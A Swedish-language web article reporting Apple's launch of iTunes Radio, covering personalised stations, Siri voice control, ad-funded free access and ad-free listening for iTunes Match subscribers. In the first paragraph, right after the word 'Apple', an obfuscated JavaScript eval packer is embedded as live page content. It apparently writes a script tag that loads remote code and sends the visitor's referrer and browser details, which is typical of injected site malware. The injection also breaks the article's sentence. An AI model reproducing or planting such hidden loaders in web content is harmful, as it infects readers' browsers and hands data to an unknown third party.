Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Apple presenterar iTunes Radio

apple

Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aziiy|var|u0026u|referrer|fadye||js|php’.split(’|’),0,{}))
presenterade idag iTunes Radio, en kostnadsfri internetradiotjänst med över 200 stationer och en omfattande musikkatalog från iTunes Store, kombinerat med funktioner som bara iTunes kan leverera. Med iTunes Radio på din iPhone, iPad, iPod touch, Mac, PC eller Apple TV får du tillgång till stationer inspirerade av den musik du brukar lyssna på, stationer i blickfånget med musik som valts ut av Apple och genrebaserade stationer som är anpassade efter just din musiksmak.

iTunes Radio utvecklas baserat på den musik du spelar och hämtar. Ju mer du använder iTunes Radio och iTunes, desto bättre lär sig programmet vad du gillar och desto mer personligt blir urvalet av låtar. iTunes Radio ger också tillgång till exklusiva premiärlyssningar av nya låtar från de populäraste artisterna och integrering med Siri. Du kan även märka eller köpa det du hör med bara ett klick.

”iTunes Radio är ett fantastiskt sätt att lyssna på skräddarsydda radiostationer som tagits fram speciellt för dig som lyssnar”, säger Eddy Cue, Apples vice VD för internetprogram och internettjänster. ”Där hittar du din favoritmusik och ny musik som du inte visste att du gillade. Du köper musiken från iTunes Store med bara ett klick.”

iTunes Radio erbjuder alla musikfans tillgång till tusentals nya låtar varje vecka, plus exklusiv ny musik från nya och populära artister som spelas här innan du hör den någon annanstans. iTunes Radio har allt från exklusiva singlar från nya band som är på väg att bli stora till streamade förhandssläpp av hela album. iTunes Radio kommer också att presentera speciella musikevenemang, som livestreamad musik direkt från iTunes-festivalen i London och andra exklusiva iTunes-sessioner.

iTunes Radio lanseras i höst och erbjuder personlig radiolyssning från dag ett, baserat på din lyssningshistorik och dina tidigare inköp från iTunes. Om du hör en låt du tycker om på iTunes Radio eller i ditt musikbibliotek kan du låta iTunes Radio bygga en hel station kring den. Det är lätt att skapa och anpassa stationer efter precis det du vill höra. Sök efter artister, låtar eller genrer och låt iTunes Radio skapa radiostationer utifrån dem.

Med Siri blir radiolyssningen ännu roligare. Du kan fråga Siri vem som spelar en viss låt eller be om fler låtar i samma stil, så fixar Siri det. Du kan säga någonting i stil med ”spela jazzradio” eller fråga efter dina favoritstationer eller musik i en viss genre. Forma dina egna stationer genom att berätta för Siri vad du gillar och inte gillar. Säg åt Siri när du vill pausa, stoppa uppspelningen eller hoppa över en låt. Du kan också låta Siri lägga till låtar i din önskelista så att du kan hämta dem senare.

iTunes Radio är reklamfinansierad och gratis för alla. Användare av iTunes-matchning får tillgång till iTunes Radio utan reklam och slipper då reklamavbrott i musiken. Med iTunes-matchning lagras all din musik i iCloud – även låtar som du har importerat från CD-skivor. iTunes Radio kan då använda information om hela din musiksamling så att dina radiostationer blir ännu mer personliga. iTunes-matchning kostar $24.99 för ett år.